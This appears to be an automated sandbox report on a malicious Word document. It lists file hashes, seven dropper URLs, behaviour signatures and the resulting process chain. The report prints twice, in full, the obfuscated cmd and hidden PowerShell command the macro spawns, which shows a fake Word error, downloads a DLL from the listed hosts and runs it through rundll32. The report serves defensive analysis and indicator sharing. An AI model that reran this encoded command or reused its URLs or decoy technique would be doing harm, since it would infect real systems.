2e6137fcf557c34632120de28bb38abf3fa931a005e20b1379f2e8be842ba199

General

Target

Bestand_61792947.doc
Size

160KB
MD5

fd662b4224eff8eb8d6c277c97bacbda
SHA1

adf4ec5325803601c09ab31af7840710d581aebb
SHA256

2e6137fcf557c34632120de28bb38abf3fa931a005e20b1379f2e8be842ba199
SHA512

0564cc91be29196c0202d3a59bc2f1d7927270a135b12bbeb49fbfeb090f481333bef69bc79d2b1a08b4f178e75b51ef9b65571383cc57f194fd49397ca80f12

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://ketorecipesfit.com/wp-admin/afanv/

exe.dropper

http://mertelofis.com/wp-content/As0/

exe.dropper

http://givingthanksdaily.com/CP/

exe.dropper

http://datawyse.net/0X3QY/

exe.dropper

http://cs.lcxxny.com/wp-includes/E3U8nn/

exe.dropper

http://makiyazhdoma.ru/blocked/tgEeW8M/

exe.dropper

http://trustseal.enamad.ir.redshopfa.com/admit/wJJvvG/

Signatures

Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1104 292 cmd.exe
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exerundll32.exe

flow pid process

6 1820 powershell.exe
8 488 rundll32.exe
Loads dropped DLL 4 IoCs

Processes:

rundll32.exe

pid process

908 rundll32.exe
908 rundll32.exe
908 rundll32.exe
908 rundll32.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1104	292	cmd.exe

flow	pid	process
6	1820	powershell.exe
8	488	rundll32.exe

pid	process
908	rundll32.exe
908	rundll32.exe
908	rundll32.exe
908	rundll32.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exerundll32.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\Oldkbqk\mxfntc.hbc	rundll32.exe

Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1068 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exerundll32.exe

pid process

1820 powershell.exe
1820 powershell.exe
488 rundll32.exe
488 rundll32.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1820 powershell.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

1068 WINWORD.EXE
1068 WINWORD.EXE

pid	process
1068	WINWORD.EXE

pid	process
1820	powershell.exe
1820	powershell.exe
488	rundll32.exe
488	rundll32.exe

description	pid	process
Token: SeDebugPrivilege	1820	powershell.exe

pid	process
1068	WINWORD.EXE
1068	WINWORD.EXE

Suspicious use of WriteProcessMemory 23 IoCs

Processes:

cmd.exepowershell.exerundll32.exerundll32.exe

description	pid	process	target process
PID 1104 wrote to memory of 1656	1104	cmd.exe	msg.exe
PID 1104 wrote to memory of 1656	1104	cmd.exe	msg.exe
PID 1104 wrote to memory of 1656	1104	cmd.exe	msg.exe
PID 1104 wrote to memory of 1820	1104	cmd.exe	powershell.exe
PID 1104 wrote to memory of 1820	1104	cmd.exe	powershell.exe
PID 1104 wrote to memory of 1820	1104	cmd.exe	powershell.exe
PID 1820 wrote to memory of 660	1820	powershell.exe	rundll32.exe
PID 1820 wrote to memory of 660	1820	powershell.exe	rundll32.exe
PID 1820 wrote to memory of 660	1820	powershell.exe	rundll32.exe
PID 660 wrote to memory of 908	660	rundll32.exe	rundll32.exe
PID 660 wrote to memory of 908	660	rundll32.exe	rundll32.exe
PID 660 wrote to memory of 908	660	rundll32.exe	rundll32.exe
PID 660 wrote to memory of 908	660	rundll32.exe	rundll32.exe
PID 660 wrote to memory of 908	660	rundll32.exe	rundll32.exe
PID 660 wrote to memory of 908	660	rundll32.exe	rundll32.exe
PID 660 wrote to memory of 908	660	rundll32.exe	rundll32.exe
PID 908 wrote to memory of 488	908	rundll32.exe	rundll32.exe
PID 908 wrote to memory of 488	908	rundll32.exe	rundll32.exe
PID 908 wrote to memory of 488	908	rundll32.exe	rundll32.exe
PID 908 wrote to memory of 488	908	rundll32.exe	rundll32.exe
PID 908 wrote to memory of 488	908	rundll32.exe	rundll32.exe
PID 908 wrote to memory of 488	908	rundll32.exe	rundll32.exe
PID 908 wrote to memory of 488	908	rundll32.exe	rundll32.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Bestand_61792947.doc"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1068

C:\Windows\system32\cmd.exe
cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc cwBlAHQALQBWAEEAUgBJAEEAYgBMAGUAIAAgAG4AaQA5ADcARAAgACAAKAAgACAAWwBUAFkAcABlAF0AKAAiAHsANQB9AHsAMAB9AHsAMgB9AHsAMQB9AHsANAB9AHsAMwB9ACIAIAAtAEYAJwB0AEUAJwAsACcAUgBFACcALAAnAG0ALgBpAG8ALgBEAEkAJwAsACcATwBSAFkAJwAsACcAYwB0ACcALAAnAHMAWQBzACcAKQApACAAOwBTAGUAVAAtAEkAVABlAG0AIAAgACgAIgBWAGEAIgArACIAUgBpACIAKwAiAEEAYgBMAEUAOgBrAGgAMAAiACsAIgB6AHEAeQAiACkAIAAgACgAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANwB9AHsANgB9AHsAMwB9AHsANAB9AHsANQB9AHsAMQB9ACIALQBGACAAJwBzAFkAcwBUAEUAJwAsACcARQBSACcALAAnAE0ALgBOACcALAAnAFMARQAnACwAJwByAHYAaQBjAGUAcABPAGkAbgB0ACcALAAnAG0AQQBuAGEAZwAnACwAJwAuACcALAAnAEUAVAAnACkAIAApACAAIAA7ACQAWgB1AGwANAA1AHAAdgA9ACQAQQA3ADUAUAAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAVQAyADQAQgA7ACQASgA2ADMARgA9ACgAJwBBAF8AJwArACcAOQBKACcAKQA7ACAAIAAkAG4ASQA5ADcARAA6ADoAIgBDAHIARQBgAEEAYABUAGUARABpAGAAUgBFAGMAdABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHQAJwArACcAZAAnACsAKAAnAFkAJwArACcAQgB2AHYAJwApACsAJwBqACcAKwAnAG4AZQAnACsAJwBlAHQAJwArACgAJwBkAFkARwAnACsAJwBoACcAKwAnAHEAcQBxAGcAdgB0AGQAJwApACsAJwBZACcAKQAuACIAUgBgAEUAYABQAGwAYQBjAGUAIgAoACgAJwB0ACcAKwAnAGQAWQAnACkALAAnAFwAJwApACkAKQA7ACQASQAwADkARQA9ACgAKAAnAEsAJwArACcANQAxACcAKQArACcAWAAnACkAOwAgACQAawBIADAAegBRAHkAOgA6ACIAUwBgAGUAQwBVAHIAYABpAHQAYAB5AFAAUgBPAFQATwBDAE8ATAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARwAwAF8AQgA9ACgAJwBFAF8AJwArACcAMQBMACcAKQA7ACQASQA5AG0AeABoAG0AcwAgAD0AIAAoACcASwA0ACcAKwAnADIATgAnACkAOwAkAFAAOAAxAEIAPQAoACcATgA4ACcAKwAnADkAWQAnACkAOwAkAEwAdAB4AHAAaQA5AGUAPQAkAEgATwBNAEUAKwAoACgAKAAnAEMAJwArACcATQA0AEIAdgB2AGoAbgAnACsAJwBlAGUAQwAnACsAJwBNACcAKQArACcANABHACcAKwAnAGgAJwArACgAJwBxAHEAJwArACcAcQBnACcAKQArACcAdgBDACcAKwAnAE0ANAAnACkALgAiAFIAYABlAHAAbABBAGAAQwBlACIAKAAoACcAQwAnACsAJwBNADQAJwApACwAJwBcACcAKQApACsAJABJADkAbQB4AGgAbQBzACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABFADAAMwBVAD0AKAAoACcASwAyACcAKwAnADUAJwApACsAJwBBACcAKQA7ACQARQBmADMAMwBzADQAcQA9ACgAJwBBACcAKwAoACcAXQBbAHEAWwBEACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBrAGUAdABvACcAKQArACcAcgAnACsAKAAnAGUAJwArACcAYwBpACcAKQArACcAcABlACcAKwAoACcAcwBmAGkAdAAnACsAJwAuACcAKwAnAGMAbwBtAC8AdwBwACcAKQArACgAJwAtACcAKwAnAGEAZAAnACkAKwAnAG0AJwArACcAaQAnACsAJwBuACcAKwAnAC8AJwArACgAJwBhAGYAYQAnACsAJwBuACcAKQArACcAdgAvACcAKwAoACcAQAAnACsAJwBBAF0AJwApACsAKAAnAFsAcQAnACsAJwBbAEQAOgAnACkAKwAnAC8AJwArACgAJwAvAG0AZQAnACsAJwByACcAKQArACgAJwB0ACcAKwAnAGUAbABvAGYAaQBzACcAKQArACcALgAnACsAJwBjACcAKwAoACcAbwAnACsAJwBtAC8AdwAnACkAKwAoACcAcAAtACcAKwAnAGMAbwAnACkAKwAnAG4AJwArACgAJwB0ACcAKwAnAGUAbgAnACkAKwAoACcAdAAvACcAKwAnAEEAJwApACsAJwBzACcAKwAoACcAMAAvAEAAJwArACcAQQBdACcAKwAnAFsAJwApACsAJwBxAFsAJwArACcARAA6ACcAKwAoACcALwAnACsAJwAvAGcAaQAnACkAKwAoACcAdgBpACcAKwAnAG4AJwApACsAJwBnACcAKwAoACcAdABoAGEAJwArACcAbgBrAHMAJwApACsAKAAnAGQAYQAnACsAJwBpACcAKQArACgAJwBsAHkALgBjAG8AJwArACcAbQAnACsAJwAvAEMAUAAvACcAKQArACgAJwBAAEEAJwArACcAXQAnACkAKwAoACcAWwAnACsAJwBxACcAKwAnAFsARAA6AC8ALwBkAGEAdAAnACsAJwBhAHcAeQAnACkAKwAnAHMAZQAnACsAKAAnAC4AbgAnACsAJwBlACcAKQArACcAdAAvACcAKwAoACcAMABYADMAUQAnACsAJwBZACcAKQArACcALwBAACcAKwAoACcAQQBdACcAKwAnAFsAcQBbACcAKQArACgAJwBEADoALwAvAGMAJwArACcAcwAnACkAKwAoACcALgBsAGMAeAB4AG4AeQAnACsAJwAuACcAKQArACgAJwBjACcAKwAnAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAnAC0AaQAnACsAKAAnAG4AYwAnACsAJwBsACcAKQArACgAJwB1AGQAJwArACcAZQBzACcAKwAnAC8AJwArACcARQAzACcAKwAnAFUAOABuAG4ALwBAAEEAXQAnACsAJwBbAHEAWwBEADoAJwArACcALwAnACsAJwAvAG0AJwApACsAKAAnAGEAJwArACcAawBpACcAKQArACcAeQAnACsAKAAnAGEAegBoACcAKwAnAGQAJwApACsAKAAnAG8AbQAnACsAJwBhAC4AcgAnACsAJwB1ACcAKQArACcALwAnACsAJwBiACcAKwAoACcAbABvAGMAawBlACcAKwAnAGQAJwArACcALwB0AGcAJwApACsAJwBFAGUAJwArACcAVwAnACsAKAAnADgATQAnACsAJwAvACcAKQArACgAJwBAAEEAJwArACcAXQBbAHEAJwArACcAWwBEADoALwAvACcAKQArACcAdAAnACsAKAAnAHIAJwArACcAdQBzAHQAcwAnACsAJwBlAGEAbAAuAGUAbgAnACkAKwAoACcAYQAnACsAJwBtAGEAZAAuACcAKwAnAGkAcgAnACkAKwAoACcALgByACcAKwAnAGUAZAAnACkAKwAnAHMAaAAnACsAKAAnAG8AcAAnACsAJwBmAGEALgBjACcAKwAnAG8AbQAvAGEAJwApACsAKAAnAGQAbQAnACsAJwBpAHQAJwArACcALwB3AEoASgB2AHYARwAvACcAKQApAC4AIgByAEUAcABsAEEAYABDAGUAIgAoACgAKAAnAEEAJwArACcAXQBbAHEAJwApACsAJwBbAEQAJwApACwAKABbAGEAcgByAGEAeQBdACgAKAAnAGQAcwAnACsAKAAnAGUAdwAnACsAJwBmACcAKQApACwAKAAoACcAdwBlACcAKwAnAHYAJwApACsAJwB3AGUAJwApACkALAAoACgAJwBhAGUAJwArACcAZgAnACkAKwAnAGYAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACkAWwAyAF0AKQAuACIAcwBwAGAATABpAFQAIgAoACQATwA3ADMATAAgACsAIAAkAFoAdQBsADQANQBwAHYAIAArACAAJABBAF8ANABDACkAOwAkAEEAOAAzAEsAPQAoACgAJwBVADQAJwArACcAXwAnACkAKwAnAE0AJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABRAHYAdABuAGQAdgBfACAAaQBuACAAJABFAGYAMwAzAHMANABxACkAewB0AHIAeQB7ACgAJgAoACcATgAnACsAJwBlAHcALQBPAGIAagAnACsAJwBlAGMAdAAnACkAIABTAFkAUwBUAEUATQAuAG4AZQBUAC4AVwBFAEIAYwBsAGkAZQBOAFQAKQAuACIAZABPAHcATgBgAEwATwBBAGQAYABGAEkATABFACIAKAAkAFEAdgB0AG4AZAB2AF8ALAAgACQATAB0AHgAcABpADkAZQApADsAJABOADEAMQBDAD0AKAAoACcASQAnACsAJwA5ADMAJwApACsAJwBLACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABMAHQAeABwAGkAOQBlACkALgAiAGwARQBuAGAAZwBgAFQAaAAiACAALQBnAGUAIAA0ADYAOAA1ADUAKQAgAHsAJgAoACcAcgB1ACcAKwAnAG4AZABsAGwAJwArACcAMwAyACcAKQAgACQATAB0AHgAcABpADkAZQAsACgAJwBTACcAKwAoACcAaAAnACsAJwBvACcAKwAnAHcARABpAGEAbAAnACkAKwAoACcAbwBnACcAKwAnAEEAJwApACkALgAiAHQAbwBzAFQAYABSAGkAYABOAGcAIgAoACkAOwAkAFgAMgBfAEYAPQAoACcATAA3ACcAKwAnADIASwAnACkAOwBiAHIAZQBhAGsAOwAkAEwAOAA4AFgAPQAoACcAUQAwACcAKwAnADcARwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEYAXwA2AEMAPQAoACgAJwBOADIAJwArACcAMAAnACkAKwAnAFAAJwApAA==
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1104

C:\Windows\system32\msg.exe
msg Admin /v Word experienced an error trying to open the file.
2⤵
PID:1656

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w hidden -enc cwBlAHQALQBWAEEAUgBJAEEAYgBMAGUAIAAgAG4AaQA5ADcARAAgACAAKAAgACAAWwBUAFkAcABlAF0AKAAiAHsANQB9AHsAMAB9AHsAMgB9AHsAMQB9AHsANAB9AHsAMwB9ACIAIAAtAEYAJwB0AEUAJwAsACcAUgBFACcALAAnAG0ALgBpAG8ALgBEAEkAJwAsACcATwBSAFkAJwAsACcAYwB0ACcALAAnAHMAWQBzACcAKQApACAAOwBTAGUAVAAtAEkAVABlAG0AIAAgACgAIgBWAGEAIgArACIAUgBpACIAKwAiAEEAYgBMAEUAOgBrAGgAMAAiACsAIgB6AHEAeQAiACkAIAAgACgAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANwB9AHsANgB9AHsAMwB9AHsANAB9AHsANQB9AHsAMQB9ACIALQBGACAAJwBzAFkAcwBUAEUAJwAsACcARQBSACcALAAnAE0ALgBOACcALAAnAFMARQAnACwAJwByAHYAaQBjAGUAcABPAGkAbgB0ACcALAAnAG0AQQBuAGEAZwAnACwAJwAuACcALAAnAEUAVAAnACkAIAApACAAIAA7ACQAWgB1AGwANAA1AHAAdgA9ACQAQQA3ADUAUAAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAVQAyADQAQgA7ACQASgA2ADMARgA9ACgAJwBBAF8AJwArACcAOQBKACcAKQA7ACAAIAAkAG4ASQA5ADcARAA6ADoAIgBDAHIARQBgAEEAYABUAGUARABpAGAAUgBFAGMAdABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHQAJwArACcAZAAnACsAKAAnAFkAJwArACcAQgB2AHYAJwApACsAJwBqACcAKwAnAG4AZQAnACsAJwBlAHQAJwArACgAJwBkAFkARwAnACsAJwBoACcAKwAnAHEAcQBxAGcAdgB0AGQAJwApACsAJwBZACcAKQAuACIAUgBgAEUAYABQAGwAYQBjAGUAIgAoACgAJwB0ACcAKwAnAGQAWQAnACkALAAnAFwAJwApACkAKQA7ACQASQAwADkARQA9ACgAKAAnAEsAJwArACcANQAxACcAKQArACcAWAAnACkAOwAgACQAawBIADAAegBRAHkAOgA6ACIAUwBgAGUAQwBVAHIAYABpAHQAYAB5AFAAUgBPAFQATwBDAE8ATAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARwAwAF8AQgA9ACgAJwBFAF8AJwArACcAMQBMACcAKQA7ACQASQA5AG0AeABoAG0AcwAgAD0AIAAoACcASwA0ACcAKwAnADIATgAnACkAOwAkAFAAOAAxAEIAPQAoACcATgA4ACcAKwAnADkAWQAnACkAOwAkAEwAdAB4AHAAaQA5AGUAPQAkAEgATwBNAEUAKwAoACgAKAAnAEMAJwArACcATQA0AEIAdgB2AGoAbgAnACsAJwBlAGUAQwAnACsAJwBNACcAKQArACcANABHACcAKwAnAGgAJwArACgAJwBxAHEAJwArACcAcQBnACcAKQArACcAdgBDACcAKwAnAE0ANAAnACkALgAiAFIAYABlAHAAbABBAGAAQwBlACIAKAAoACcAQwAnACsAJwBNADQAJwApACwAJwBcACcAKQApACsAJABJADkAbQB4AGgAbQBzACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABFADAAMwBVAD0AKAAoACcASwAyACcAKwAnADUAJwApACsAJwBBACcAKQA7ACQARQBmADMAMwBzADQAcQA9ACgAJwBBACcAKwAoACcAXQBbAHEAWwBEACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBrAGUAdABvACcAKQArACcAcgAnACsAKAAnAGUAJwArACcAYwBpACcAKQArACcAcABlACcAKwAoACcAcwBmAGkAdAAnACsAJwAuACcAKwAnAGMAbwBtAC8AdwBwACcAKQArACgAJwAtACcAKwAnAGEAZAAnACkAKwAnAG0AJwArACcAaQAnACsAJwBuACcAKwAnAC8AJwArACgAJwBhAGYAYQAnACsAJwBuACcAKQArACcAdgAvACcAKwAoACcAQAAnACsAJwBBAF0AJwApACsAKAAnAFsAcQAnACsAJwBbAEQAOgAnACkAKwAnAC8AJwArACgAJwAvAG0AZQAnACsAJwByACcAKQArACgAJwB0ACcAKwAnAGUAbABvAGYAaQBzACcAKQArACcALgAnACsAJwBjACcAKwAoACcAbwAnACsAJwBtAC8AdwAnACkAKwAoACcAcAAtACcAKwAnAGMAbwAnACkAKwAnAG4AJwArACgAJwB0ACcAKwAnAGUAbgAnACkAKwAoACcAdAAvACcAKwAnAEEAJwApACsAJwBzACcAKwAoACcAMAAvAEAAJwArACcAQQBdACcAKwAnAFsAJwApACsAJwBxAFsAJwArACcARAA6ACcAKwAoACcALwAnACsAJwAvAGcAaQAnACkAKwAoACcAdgBpACcAKwAnAG4AJwApACsAJwBnACcAKwAoACcAdABoAGEAJwArACcAbgBrAHMAJwApACsAKAAnAGQAYQAnACsAJwBpACcAKQArACgAJwBsAHkALgBjAG8AJwArACcAbQAnACsAJwAvAEMAUAAvACcAKQArACgAJwBAAEEAJwArACcAXQAnACkAKwAoACcAWwAnACsAJwBxACcAKwAnAFsARAA6AC8ALwBkAGEAdAAnACsAJwBhAHcAeQAnACkAKwAnAHMAZQAnACsAKAAnAC4AbgAnACsAJwBlACcAKQArACcAdAAvACcAKwAoACcAMABYADMAUQAnACsAJwBZACcAKQArACcALwBAACcAKwAoACcAQQBdACcAKwAnAFsAcQBbACcAKQArACgAJwBEADoALwAvAGMAJwArACcAcwAnACkAKwAoACcALgBsAGMAeAB4AG4AeQAnACsAJwAuACcAKQArACgAJwBjACcAKwAnAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAnAC0AaQAnACsAKAAnAG4AYwAnACsAJwBsACcAKQArACgAJwB1AGQAJwArACcAZQBzACcAKwAnAC8AJwArACcARQAzACcAKwAnAFUAOABuAG4ALwBAAEEAXQAnACsAJwBbAHEAWwBEADoAJwArACcALwAnACsAJwAvAG0AJwApACsAKAAnAGEAJwArACcAawBpACcAKQArACcAeQAnACsAKAAnAGEAegBoACcAKwAnAGQAJwApACsAKAAnAG8AbQAnACsAJwBhAC4AcgAnACsAJwB1ACcAKQArACcALwAnACsAJwBiACcAKwAoACcAbABvAGMAawBlACcAKwAnAGQAJwArACcALwB0AGcAJwApACsAJwBFAGUAJwArACcAVwAnACsAKAAnADgATQAnACsAJwAvACcAKQArACgAJwBAAEEAJwArACcAXQBbAHEAJwArACcAWwBEADoALwAvACcAKQArACcAdAAnACsAKAAnAHIAJwArACcAdQBzAHQAcwAnACsAJwBlAGEAbAAuAGUAbgAnACkAKwAoACcAYQAnACsAJwBtAGEAZAAuACcAKwAnAGkAcgAnACkAKwAoACcALgByACcAKwAnAGUAZAAnACkAKwAnAHMAaAAnACsAKAAnAG8AcAAnACsAJwBmAGEALgBjACcAKwAnAG8AbQAvAGEAJwApACsAKAAnAGQAbQAnACsAJwBpAHQAJwArACcALwB3AEoASgB2AHYARwAvACcAKQApAC4AIgByAEUAcABsAEEAYABDAGUAIgAoACgAKAAnAEEAJwArACcAXQBbAHEAJwApACsAJwBbAEQAJwApACwAKABbAGEAcgByAGEAeQBdACgAKAAnAGQAcwAnACsAKAAnAGUAdwAnACsAJwBmACcAKQApACwAKAAoACcAdwBlACcAKwAnAHYAJwApACsAJwB3AGUAJwApACkALAAoACgAJwBhAGUAJwArACcAZgAnACkAKwAnAGYAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACkAWwAyAF0AKQAuACIAcwBwAGAATABpAFQAIgAoACQATwA3ADMATAAgACsAIAAkAFoAdQBsADQANQBwAHYAIAArACAAJABBAF8ANABDACkAOwAkAEEAOAAzAEsAPQAoACgAJwBVADQAJwArACcAXwAnACkAKwAnAE0AJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABRAHYAdABuAGQAdgBfACAAaQBuACAAJABFAGYAMwAzAHMANABxACkAewB0AHIAeQB7ACgAJgAoACcATgAnACsAJwBlAHcALQBPAGIAagAnACsAJwBlAGMAdAAnACkAIABTAFkAUwBUAEUATQAuAG4AZQBUAC4AVwBFAEIAYwBsAGkAZQBOAFQAKQAuACIAZABPAHcATgBgAEwATwBBAGQAYABGAEkATABFACIAKAAkAFEAdgB0AG4AZAB2AF8ALAAgACQATAB0AHgAcABpADkAZQApADsAJABOADEAMQBDAD0AKAAoACcASQAnACsAJwA5ADMAJwApACsAJwBLACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABMAHQAeABwAGkAOQBlACkALgAiAGwARQBuAGAAZwBgAFQAaAAiACAALQBnAGUAIAA0ADYAOAA1ADUAKQAgAHsAJgAoACcAcgB1ACcAKwAnAG4AZABsAGwAJwArACcAMwAyACcAKQAgACQATAB0AHgAcABpADkAZQAsACgAJwBTACcAKwAoACcAaAAnACsAJwBvACcAKwAnAHcARABpAGEAbAAnACkAKwAoACcAbwBnACcAKwAnAEEAJwApACkALgAiAHQAbwBzAFQAYABSAGkAYABOAGcAIgAoACkAOwAkAFgAMgBfAEYAPQAoACcATAA3ACcAKwAnADIASwAnACkAOwBiAHIAZQBhAGsAOwAkAEwAOAA4AFgAPQAoACcAUQAwACcAKwAnADcARwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEYAXwA2AEMAPQAoACgAJwBOADIAJwArACcAMAAnACkAKwAnAFAAJwApAA==
2⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1820

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Users\Admin\Bvvjnee\Ghqqqgv\K42N.dll ShowDialogA
3⤵
- Suspicious use of WriteProcessMemory
PID:660

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Users\Admin\Bvvjnee\Ghqqqgv\K42N.dll ShowDialogA
4⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:908

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Oldkbqk\mxfntc.hbc",ShowDialogA
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:488

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Bvvjnee\Ghqqqgv\K42N.dll
MD5
c3ca293c81bb2120ddfd6afe4b36067d

SHA1
53699c4f6b813410a2d0cdcab63d143c5dcc4d6c

SHA256
026ea26b443159bab5120192ec8e80766d44231ba8642fb74a32695a46de95ca

SHA512
3f5bafcc9b9a17dbb4465989db23236247c971fc7182e7c2ad67d90c4c981570d9e93dfdc720e5330a0bc5b390a5e24ba5dd1903b3879cb9e1885fbe2b566a9f

Download Submit
\Users\Admin\Bvvjnee\Ghqqqgv\K42N.dll
MD5
c3ca293c81bb2120ddfd6afe4b36067d

SHA1
53699c4f6b813410a2d0cdcab63d143c5dcc4d6c

SHA256
026ea26b443159bab5120192ec8e80766d44231ba8642fb74a32695a46de95ca

SHA512
3f5bafcc9b9a17dbb4465989db23236247c971fc7182e7c2ad67d90c4c981570d9e93dfdc720e5330a0bc5b390a5e24ba5dd1903b3879cb9e1885fbe2b566a9f

Download Submit
\Users\Admin\Bvvjnee\Ghqqqgv\K42N.dll
MD5
c3ca293c81bb2120ddfd6afe4b36067d

SHA1
53699c4f6b813410a2d0cdcab63d143c5dcc4d6c

SHA256
026ea26b443159bab5120192ec8e80766d44231ba8642fb74a32695a46de95ca

SHA512
3f5bafcc9b9a17dbb4465989db23236247c971fc7182e7c2ad67d90c4c981570d9e93dfdc720e5330a0bc5b390a5e24ba5dd1903b3879cb9e1885fbe2b566a9f

Download Submit
\Users\Admin\Bvvjnee\Ghqqqgv\K42N.dll
MD5
c3ca293c81bb2120ddfd6afe4b36067d

SHA1
53699c4f6b813410a2d0cdcab63d143c5dcc4d6c

SHA256
026ea26b443159bab5120192ec8e80766d44231ba8642fb74a32695a46de95ca

SHA512
3f5bafcc9b9a17dbb4465989db23236247c971fc7182e7c2ad67d90c4c981570d9e93dfdc720e5330a0bc5b390a5e24ba5dd1903b3879cb9e1885fbe2b566a9f

Download Submit
\Users\Admin\Bvvjnee\Ghqqqgv\K42N.dll
MD5
c3ca293c81bb2120ddfd6afe4b36067d

SHA1
53699c4f6b813410a2d0cdcab63d143c5dcc4d6c

SHA256
026ea26b443159bab5120192ec8e80766d44231ba8642fb74a32695a46de95ca

SHA512
